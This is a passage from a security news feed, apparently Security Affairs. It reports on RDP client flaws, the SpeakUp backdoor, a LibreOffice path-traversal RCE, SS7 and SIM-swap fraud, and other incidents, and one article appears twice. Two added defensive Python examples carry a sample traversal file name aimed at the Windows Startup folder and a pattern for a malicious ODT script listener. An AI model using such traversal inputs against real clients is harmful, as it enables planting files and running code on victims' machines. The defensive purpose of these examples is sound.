In this case too, the experts discovered flaws that could allow a rogue RDP server to execute arbitrary code on a client.

Microsoft RDP is also affected by major vulnerabilities; the experts discovered an issue related to the fact that the client and the server share clipboard data by default.

This means that anything in the clipboard, for example copied files, passwords or cryptocurrency wallet keys, could be accessed by the attackers. An attacker can also drop a malicious file into the Windows “Startup” folder so that it is executed every time the system boots.

“If a client uses the “Copy & Paste” feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files to arbitrary file locations on the client’s computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client’s “Startup” folder, and after a reboot they will be executed on his computer, giving us full control.” continue the experts.

“Note: In our exploit, we simply killed rdpclip.exe, and spawned our own process to perform the path traversal attack by adding additional malicious file to every “Copy & Paste” operation. The attack was performed with “user” permissions, and does not require the attacker to have “system” or any other elevated permission.”
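The clipboard case is a path traversal bug: the client trusts the file names the server sends and writes them wherever the name points. As an added example that is neither Check Point’s PoC nor Microsoft’s code, the check below shows how a client should validate each received name before writing it under its drop directory; the drop directory and the file names are constructed for the example.

```python
"""Validate file names received over a remote clipboard file transfer.

Added example, not Check Point's or Microsoft's code.  A client that
accepts a file list from the server must ensure that every entry ends
up *inside* its local drop directory.  Names carrying "..\\" segments,
drive letters or rooted paths (the way the Startup-folder drop on this
page works) are rejected before anything touches the disk.
"""
from pathlib import Path, PureWindowsPath


def safe_destination(drop_dir: str, name: str) -> Path:
    """Return the local path a received file may be written to, or raise
    ValueError when `name` would escape `drop_dir`.

    The name is interpreted as a relative Windows path because that is
    what an RDP server sends; both '\\' and '/' are treated as separators.
    """
    base = Path(drop_dir).resolve()
    rel = PureWindowsPath(name)
    # Reject 'C:\\...' and '\\...' outright: a received name must be relative.
    if rel.is_absolute() or rel.drive or rel.root:
        raise ValueError(f"absolute path rejected: {name!r}")
    # Reject any '..' (and the pointless '.') segment before joining.
    if any(part in ("..", ".") for part in rel.parts):
        raise ValueError(f"traversal segment rejected: {name!r}")
    dest = base.joinpath(*rel.parts).resolve()
    # Belt and braces: the resolved target must still lie under base.
    if dest != base and base not in dest.parents:
        raise ValueError(f"escapes drop directory: {name!r}")
    return dest


def filter_received_names(drop_dir: str, names):
    """Split a received file list into (accepted paths, rejected names)."""
    accepted, rejected = [], []
    for n in names:
        try:
            accepted.append(safe_destination(drop_dir, n))
        except ValueError:
            rejected.append(n)
    return accepted, rejected


# Constructed sample of names a server might send (example data only).
SAMPLE_NAMES = [
    "report.txt",
    "sub\\notes.txt",
    "..\\..\\Start Menu\\Programs\\Startup\\evil.bat",
    "C:\\Windows\\x.exe",
]

if __name__ == "__main__":
    ok, bad = filter_received_names("/tmp/rdp_drop", SAMPLE_NAMES)
    print("accepted:", [str(p) for p in ok])
    print("rejected:", bad)
```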

The experts also published a video PoC of the attack.

The vulnerabilities discovered by the experts could be used in multiple attack scenarios; hackers could exploit them to compromise a target machine running a vulnerable RDP client and exfiltrate data.

Attackers can gain elevated network permissions by deploying such an attack and then attempt lateral movement inside the organization. Hackers can, for example, attack an IT member that connects to an infected workstation inside the corporate network, or a malware researcher that connects to a remote sandboxed virtual machine containing malware under analysis. In the latter scenario, the malicious code could escape the sandbox and compromise the corporate network.

Check Point reported its findings to the development teams of the RDP tools in October 2018. FreeRDP developers addressed the flaws with a patch to the software in the GitHub repository in November; rdesktop developers released a fix in mid-January.

Microsoft confirmed the findings of the study but replied with this eloquent and questionable answer:

“Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).”

This means that Microsoft users remain exposed to the attacks described by Check Point.

“Although the code quality of the different clients varies, as can be seen by the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated, and is prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft’s client and one of the open-sourced clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution over the client’s computer,” the security firm concluded.

The FBI Internet Crime Complaint Center (IC3) and the DHS recently issued a joint alert to highlight the rise of RDP as an attack vector.

Attackers are exploiting exposed RDP services to access systems and deploy malware such as the SamSam ransomware.

Pierluigi Paganini

(SecurityAffairs – RDP, hacking)

The post Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients appeared first on Security Affairs.

SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.

Security experts at Check Point discovered a new backdoor dubbed SpeakUp targeting Linux servers in East Asia and Latin America.

Malware researchers at Check Point have spotted a new Linux backdoor dubbed ‘SpeakUp’ targeting servers in East Asia and Latin America.


The SpeakUp backdoor leverages known vulnerabilities in six different Linux distros, and it is also able to infect Mac systems. The Trojan spreads by exploiting remote code execution flaws; for the initial infection the hackers leverage a recently disclosed flaw in ThinkPHP (CVE-2018-20062).

Researchers linked the author of the SpeakUp backdoor with the malware developer that goes online with the moniker of Zettabithf.

Most of the infected machines are in China, the same country where the sample analyzed by Check Point was spotted on January 14, 2019.

“The sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9 2019. At the time of writing this article, it has no detections in VT.” reads the analysis published by the experts.

Once it has infected the system, the backdoor connects to the command and control (C&C) server to register the machine. It gains persistence by using cron and an internal mutex, so that only one instance remains alive at all times.

The backdoor supports the following commands:

  • newtask – to execute arbitrary code, download and execute a file, kill or uninstall a program, and send updated fingerprint data;
  • notask – sleep for 3 seconds and ask for additional command;
  • newerconfig – to update the downloaded miner configuration file.

The backdoor uses a Python script to scan and infect other Linux servers within internal and external subnets; it is also able to carry out brute-force attacks against admin panels.

The script attempts to exploit the following RCE vulnerabilities in the targeted servers:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution (exploit)
  • CVE-2017-10271: Oracle WebLogic wlswsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager – Command Execution (exploit)
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Further research allowed the experts to find the liteHTTP GitHub project, which has some modules similar to the SpeakUp Trojan.

“SpeakUp’s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy few miners.” Check Point concludes.

“The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive,”

Pierluigi Paganini

(SecurityAffairs – SpeakUp, backdoor)

The post SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM. appeared first on Security Affairs.

Severe bug in LibreOffice and OpenOffice suites allows remote code execution

A security expert discovered a severe Remote Code Execution vulnerability in the popular LibreOffice and Apache OpenOffice.

The security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file embedding a malicious event. The flaw could have a huge impact because these popular free, open source office suites are used by millions of Windows, MacOS and Linux users.


The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseover event to a link included in the ODT file.

The expert devised an attack that relies on exploiting a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting the vulnerability it is possible to trigger the automatic execution of a specific Python file included in the suite using a hidden onmouseover event.

Inführ used a specially crafted ODT file containing a white-colored hyperlink (the white color makes it invisible in the document) that has an “onmouseover” event to execute a local Python file.

The expert pointed out that the Python file, named “pydoc.py,” is already included in the LibreOffice software. The suite has its own Python interpreter, and the file accepts arbitrary commands in one of its parameters and executes them through the system’s command line or console.

“The idea was to abuse the path traversal to traverse down into the users Download directory and load the ODT file as a python script (ergo creating a polyglot file, which is a python file + a working ODT file).” wrote the expert.

“For the solution I looked into the python parsing code a little more in depth and discovered that it is not only possible to specify the function you want to call inside a python script, but it is possible to pass parameters as well (this feature seems to be introduced in the 6.1.x branch).”
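Because the trigger lives in the document’s XML as a script event listener on a hyperlink, a mail gateway or endpoint tool can look for it before the file is ever opened. The following scanner is an added example (not Inführ’s PoC and not LibreOffice code): it unpacks an ODT, lists every `script:event-listener`, and marks those whose macro URL contains a traversal segment or requests the Python language. The sample document is built in memory and its macro target is a placeholder, not the real exploit string.

```python
"""Scan an ODT for script event listeners of the kind abused in
CVE-2018-16858 (added example; not the researcher's PoC).

An ODT is a zip archive; hyperlinks live in content.xml (and sometimes
styles.xml) as <text:a> elements that may carry
<office:event-listeners><script:event-listener .../>.  The exploit used
a dom:mouseover listener whose xlink:href was a vnd.sun.star.script:
URL with "../" segments pointing at a Python file.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

NS_SCRIPT = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"
EVENT_LISTENER = f"{{{NS_SCRIPT}}}event-listener"
EVENT_NAME = f"{{{NS_SCRIPT}}}event-name"
HREF = f"{{{NS_XLINK}}}href"


def classify_href(href: str) -> bool:
    """True when a macro URL looks like the traversal/Python pattern."""
    low = href.lower()
    if not low.startswith("vnd.sun.star.script:"):
        return False
    traversal = "../" in low or "..\\" in low or "..%2f" in low
    wants_python = "language=python" in low
    return traversal or wants_python


def scan_odt(data: bytes):
    """Return one dict per script event listener found in the document."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for member in ("content.xml", "styles.xml"):
            if member not in z.namelist():
                continue
            root = ET.fromstring(z.read(member))
            for el in root.iter(EVENT_LISTENER):
                href = el.get(HREF, "")
                findings.append({
                    "file": member,
                    "event": el.get(EVENT_NAME, ""),
                    "href": href,
                    "suspicious": classify_href(href),
                })
    return findings


def build_sample_odt(with_listener: bool = True) -> bytes:
    """Constructed minimal ODT; the listener target is a placeholder."""
    listener = (
        '<office:event-listeners>'
        '<script:event-listener script:event-name="dom:mouseover" '
        'script:language="ooo:script" '
        'xlink:href="vnd.sun.star.script:../../../PLACEHOLDER.py$func'
        '?language=Python&amp;location=share"/>'
        '</office:event-listeners>'
    ) if with_listener else ""
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<office:document-content '
        'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        f'xmlns:script="{NS_SCRIPT}" xmlns:xlink="{NS_XLINK}">'
        '<office:body><office:text><text:p>'
        '<text:a xlink:href="http://example.invalid/">'
        f'{listener}link</text:a>'
        '</text:p></office:text></office:body></office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        z.writestr("content.xml", content)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_odt(build_sample_odt()):
        flag = "SUSPICIOUS" if f["suspicious"] else "info"
        print(f"[{flag}] {f['file']}: {f['event']} -> {f['href']}")
```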

Inführ also published a video PoC of the attack that shows how to use the event to trigger the execution of a specific function within a Python file.

The expert also published the PoC exploit code for the flaw that works on Windows OS.

Inführ reported the vulnerability to LibreOffice and Apache OpenOffice on October 18 last year. While LibreOffice fixed the issue by the end of that month with the release of LibreOffice 6.0.7/6.1.3, OpenOffice still appears to be vulnerable.

Red Hat assigned the CVE ID to the flaw and asked the researcher to wait until January 31, 2019 for its public disclosure.

Until a fix is available, it is possible to remove or rename the pythonscript.py file in the installation folder to disable Python support.

Pierluigi Paganini

(Security Affairs – Libre Office, hacking)

The post Severe bug in LibreOffice and OpenOffice suites allows remote code execution appeared first on Security Affairs.

Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild

Security experts identified nearly 500,000 Ubiquiti devices that may be affected by a vulnerability that has already been exploited in the wild.

Security experts are warning Ubiquiti users of a vulnerability that has already been exploited in the wild.

Last week, the researcher Jim Troutman, consultant and director of the Northern New England Neutral Internet Exchange (NNENIX), revealed that threat actors had been targeting Ubiquiti installs exposed online. Remote attackers were targeting the networking devices exposed via a discovery service accessible on UDP port 10001.

According to the expert, the devices are affected by a DoS flaw that attackers were attempting to trigger.

The vulnerability is not a novelty in the security and Ubiquiti communities; in June the issue was discussed in a thread on the Ubiquiti forums, where users were warning of a possible exploit used in the wild.

Now security experts at Rapid7 revealed that they had been monitoring suspicious traffic destined for port 10001 for at least one year.

Ubiquiti is aware of the issue and is currently working on a firmware update that will address it; in the meantime, it is downplaying the issue.

“There has been some discussion lately about a bug in airOS which can result in management access to airOS devices becoming inoperable until these devices are rebooted. This issue appears to be caused by external access to airOS devices using port 10001. As a temporary workaround for this issue while it is being investigated and resolved by the development team, network operators can block port 10001 at the network perimeter.” reads the advisory published by Ubiquiti.

“To our current knowledge, this issue cannot be used to gain control of network devices or to create a DDoS attack.” 

Pending a fix, Ubiquiti recommends blocking UDP port 10001, but this solution could have a disruptive effect on some services.

Scanning the Internet for vulnerable devices using Rapid7’s Sonar project, the experts found roughly 490,000 devices exposed online. Most of the vulnerable Ubiquiti devices are located in Brazil, followed by the United States and Spain.

“By decoding the responses, we are able to learn about the nature of these devices and clues as to how or why they are exposed publicly.” continues Rapid7. “For example, by grouping by the model names returned by these responses, we see big clusters around all sorts of Ubiquiti models/devices:”

Product        n
NanoStation    172,563
AirGrid        131,575
LiteBeam        43,673
PowerBeam       40,092

The analysis of the device names revealed that in 17,000 cases they contain the string “HACKED-ROUTER-HELP-SOS,” a circumstance that suggests that they have already been hacked by exploiting other vulnerabilities.

Rapid7 reported its findings to US-CERT, CERT Brazil, and of course Ubiquiti.

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild appeared first on Security Affairs.

Experts found popular beauty apps in the Play Store including malicious code

Researchers at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were able to perform several malicious activities.

Crooks continue to abuse the Google Play store to distribute malicious apps; this time experts at Trend Micro discovered at least 29 malicious photo editing and beauty apps that were stealing users’ photos.

The malicious apps in the Google Play Store have been downloaded more than 4 million times before they were removed.


The photo editing and beauty apps included code that could perform a broad range of malicious activities.

Experts estimated that 3 of the tainted applications (Pro Camera Beauty, Cartoon Art Photo, Emoji Camera) have been downloaded more than a million times. The Artistic Effect Filter was downloaded over 500,000 times, and seven other rogue apps were installed over 100,000 times.

“We discovered several beauty camera apps (detected as AndroidOS_BadCamera.HRX) on Google Play that are capable of accessing remote ad configuration servers that can be used for malicious purposes.” reads the analysis published by Trend Micro.

“Some of these have already been downloaded millions of times, which is unsurprising given the popularity of these kinds of apps.”

When an Android user downloads one of the malicious apps, they do not immediately see any suspicious behavior.

Once installed, some of these apps would redirect users to phishing websites; others would push full-screen advertisements for fraudulent or pornographic content on the infected device every time the victim unlocks it.

Some of the beauty apps included malicious code that uploads the user’s photos to a remote server controlled by the author.

However, instead of displaying an edited photo, the apps display a picture with a fake update prompt in nine different languages.

“However, instead of getting a final result with the edited photo, the user gets a picture with a fake update prompt in nine different languages.” continues the analysis.

“The authors can collect the photos uploaded in the app, and possibly use them for malicious purposes — for example as fake profile pics in social media.”

Some of the beauty apps use packers to prevent them from being analyzed by security firms, they also hide the app icon from the list of installed applications to make it more difficult for users to uninstall them.

TrendMicro reported the list of malicious apps to Google that quickly removed them from the Play Store.

Experts recommend downloading mobile apps only from the official store and only when they were developed by known and trusted authors. Users can also check the reviews of an app and avoid installing applications for which anomalous behaviors have been reported.

Additional info, including Indicators of Compromise (IoCs), is reported in the post published by Trend Micro.

Pierluigi Paganini

(Security Affairs – beauty apps, malware)

The post Experts found popular beauty apps in the Play Store including malicious code appeared first on Security Affairs.

QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, a major Bitcoin exchange in Canada, announced that it has lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”


According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds were stored in a cold wallet; just USD 286,000 were stored in the company’s hot wallet. A ‘cold wallet’ is used by exchanges to protect funds from online threats; for this reason it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other member of the company was in possession of the key needed to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe the version provided by the QuadrigaCX team; they speculated that QuadrigaCX never had $100 million in its pool of funds. If confirmed, the company never had a cold wallet storing such an amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain records of QuadrigaCX’s Bitcoin holdings. The expert examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX, exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.



Security Affairs

QuadrigaCX exchange lost access to $145 Million funds after founder dies

QuadrigaCX Bitcoin exchange announced to have lost USD 145 million worth of cryptocurrency because the only person with access to its cold storage has died.


QuadrigaCX, the major Bitcoin exchange in Canada announced to have lost CAD 190 million (USD 145 million) worth of cryptocurrency because the only person with access to its cold (offline) storage wallets has died.

This person was Gerry Cotten, the founder and chief executive officer at QuadrigaCX. The Canadian exchange filed for legal protection from creditors in the Nova Scotia Supreme Court until it locates lost funds.

The bankruptcy hearing for QuadrigaCX is scheduled for February 5 at the same court Nova Scotia Supreme Court.

“In a sworn affidavit filed Jan. 31 with the Nova Scotia Supreme Court, Jennifer Robertson, identified as the widow of QuadrigaCX founder Gerald Cotten, said the exchange owes its customers roughly $250 million CAD ($190 million) in both cryptocurrency and fiat.” reported Coindesk.

“The company previously announced it had filed for creditor protection on its website, but the filing itself provides greater details about its predicament.

As of Jan. 31, 2019, there were roughly 115,000 users with balances signed up on the exchange, with $70 million CAD in fiat and $180 million CAD in crypto owed overall, according to the filing.

The exchange holds roughly 26,500 bitcoin ($92.3 million USD), 11,000 bitcoin cash ($1.3 million), 11,000 bitcoin cash SV ($707,000), 35,000 bitcoin gold ($352,000), nearly 200,000 litecoin ($6.5 million) and about 430,000 ether ($46 million), totaling $147 million, according to the affidavit.”

quadrigacx cryptocurrency-exchange

According to a sworn affidavit filed by Cotten’s widow Jennifer Robertson, QuadrigaCX was maintaining some CAD 260 million (USD 198 Million) in both cryptocurrencies (Bitcoin, Bitcoin Cash, Litecoin, and Ethereum) and fiat money.

The majority of the funds was stored in a cold wallet, just USD 286,000 were stored in the hot wallet of the company. A ‘cold wallet’ is used by exchanges to protect the funds from online threats, for this reason, it is a physical device that is isolated from the Internet.

The cold wallet was protected with a private key that was known only by Cotten, who unfortunately died of Crohn’s disease on December 9 in Jaipur, India.

Cotten’s wife declared that no other members of the company was in possession of the key to access the funds.

“For the past weeks, we have worked extensively to address our liquidity issues, which include attempting to locate and secure our very significant cryptocurrency reserves held in cold wallets, and that are required to satisfy customer cryptocurrency balances on deposit, as well as sourcing a financial institution to accept the bank drafts that are to be transferred to us. Unfortunately, these efforts have not been successful,” reads a message posted on the QuadrigaCX website.

Some experts don’t believe in the version provided by the QuadrigaCX team, they speculated that QuadrigaCX never dad $100 Million in is pool of funds. If confirmed, the company never had a cold wallet storing such amount of funds.

Is this an exit scam?

The researcher CryptoMed investigated the case by analyzing the blockchain of the QuadrigaCX’s Bitcoin Holdings. The experts examined TX IDs, addresses, and coin movements, and concluded that “there is no identifiable cold wallet reserves for QuadrigaCX.”

“The number of bitcoins in QuadrigaCX’s possession is substantially less than what was reported in Jennifer Robertson’s affidavit, submitted to the Canadian courts on January 31st, 2019,” reads the post published by the researcher on Medium.

“At least some of the delays in delivering crypto withdrawals to customers were due to the fact that QuadrigaCX simply did not have the funds on hand at the time. In some cases, QuadrigaCX was forced to wait for enough customer deposits to be made on the exchange before processing crypto withdrawal requests by their customers.”

“The people trying to pull off a QuadrigaCX exit scam could actually be the family and other employees, by hiding the fact that the cold wallet keys are known,” speculates bitcoin analyst Peter Todd. “Not saying this is happening, but need to consider all possibilities fairly in the investigation.”

The only certainty is that thousands of users would never be able to access their funds.

Pierluigi Paganini

(SecurityAffairs – QuadrigaCX, exit scam)

The post QuadrigaCX exchange lost access to $145 Million funds after founder dies appeared first on Security Affairs.

Young hacker gets 10 years jail sentence for SIM Swapping attacks

A 20-year-old college student that has stolen more than $5 million worth of cryptocurrency through SIM swapping attacks gets a 10 years jail sentence.

Joel Ortiz, a young hacker (20) who stole more than $5 million worth of cryptocurrency by hijacking victims’ phone numbers, has pleaded guilty to “SIM swapping” attacks.

The college student accepted a sentence of 10 years in prison for SIM hijacking attacks against at least 40 victims.

Ortiz was arrested last year on charges of hijacking victims’ phone numbers and stealing millions of dollars in cryptocurrency.

In SIM swap frauds, crooks are able to port the victim’s phone number to a new SIM card under their control.

A SIM swap fraud is a type of fraud that circumvents the additional security measures introduced by organizations to protect their customers.

Attackers obtain victims’ information by launching a phishing campaign, or by purchasing it in the underground market.

Crooks use the information gathered on the victims in an attempt to impersonate them to a telco operator and ask it to provide a new SIM to replace the old one, claiming it was lost or stolen.

They prove their identity by answering basic security questions and request the cancellation of the old SIM and the activation of a new one. Once they have obtained a new SIM, crooks can operate the victim’s mobile account, intercepting or initiating calls, accessing SMS messages (including authorization codes sent by banks and cryptocurrency exchanges) and authorizing transactions.

Joel Ortiz is the first hacker to be sentenced to prison for SIM swapping.

“The authorities think the slow but constant drip of arrests, and Ortiz’s sentencing, will send a clear message to those who are still out there.” reported Motherboard.

“Each arrest that we made sent shockwaves through that community,” West said. “That they weren’t safe in their basement, they weren’t safe in their room in their mom’s house, that they were being tracked down and arrested—one by one.”


The sentence aims to send a clear message to SIM swappers: authorities will not tolerate this kind of crime and will prosecute them with severe penalties.

According to Deputy District Director Eric West of Santa Clara County, California, Ortiz accepted a plea deal for 10 years last week; the official sentencing is set to take place on March 14th.

The case is not isolated; other hackers responsible for SIM swapping are awaiting sentencing.

Pierluigi Paganini

(SecurityAffairs – SIM Swapping, hacking)

The post Young hacker gets 10 years jail sentence for SIM Swapping attacks appeared first on Security Affairs.

Security Affairs: Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against Metro Bank: threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text message to customers to authorize transactions.

Signaling System 7, aka SS7, is a set of protocols developed in 1975 that allows one mobile phone network to connect to another. The information passed from one network to another is needed to route calls and text messages between networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaw in the SS7 protocol to defeat the two-factor authentication (2FA) used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.” reported Motherboard, which first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.”


This is not an isolated case; other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said a National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

The British telecom company BT confirmed that it is aware of SS7 attacks being used to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” said a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe a well-resourced and coordinated cybercriminal group of highly skilled professionals is behind the attacks.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.

Security firm Recorded Future discovered the hacker behind Collection #1

Researchers at the threat intel firm Recorded Future have identified the hacker who amassed the credentials in the Collection #1 archive.

Security experts at the threat intel firm Recorded Future have discovered the hacker who allegedly created and offered for sale the massive collection known as Collection #1.

The ‘Collection #1’ archive was discovered by the cyber security expert Troy Hunt; it included 773 million records.


The individual responsible for the sale of the huge trove of data goes online by the moniker “C0rpz.” C0rpz collected a huge trove of data through credential stuffing; the ‘Collection #1’ archive is a set of email addresses and passwords totalling 2,692,818,238 rows, aggregated from thousands of different sources.

According to Hunt, there are 1,160,253,228 unique combinations of email addresses and passwords, while the unique email addresses totalled 772,904,991.

“Recorded Future assesses with moderate confidence that the original creator and seller of Collection #1 was the actor “C0rpz.”” reads the analysis published by Recorded Future.

“Another actor from a well-known Russian hacking forum was also observed sharing a large database of 100 billion user accounts, which possibly has some of the same datasets found in Collection #1. “

Collection #1 was included in a larger dump containing seven other databases:

  • “ANTIPUBLIC #1” (102.04 GB)
  • “AP MYR & ZABUGOR #2” (19.49 GB)
  • “Collection #1” (87.18 GB)
  • “Collection #2” (528.50 GB)
  • “Collection #3” (37.18 GB)
  • “Collection #4” (178.58 GB)
  • “Collection #5” (40.56 GB)

While the AntiPublic dump had already leaked online, the remaining ones were seen for the first time in the hacking underground last month.

According to Recorded Future, C0rpz sold the archives to other hackers who offered them for sale on multiple hacking forums; the collections were also distributed for free via the online sharing service MEGA and via torrent magnet links.

Sanix and Clorox are two hackers who bought the data from C0rpz; the former was identified by the investigator Brian Krebs as the source of Collection #1, and the latter is the individual who shared the Collection for free on Raid Forums.

All the hackers mentioned by Recorded Future were seen for the first time by the company’s experts after the disclosure of Collection #1; they were not involved in previous campaigns or operations.

Pierluigi Paganini

(SecurityAffairs – credential stuffing, data leak)

The post Security firm Recorded Future discovered the hacker behind Collection #1 appeared first on Security Affairs.

Security Affairs: Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, let me state some facts: Global IT spend according to Gartner is 3.7 Trillion in 2018, and the Cyber security market is 150 Billion, which makes cyber security 4% of the total IT industry, growing at 10% CAGR. Of all the various solutions under cyber security, like Identity & Access, Application security, Network security, Managed security services or security operations, and cloud security, GRC is one of the fastest growing solutions in the world.

Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity
Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

Chart: Global cyber security market

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

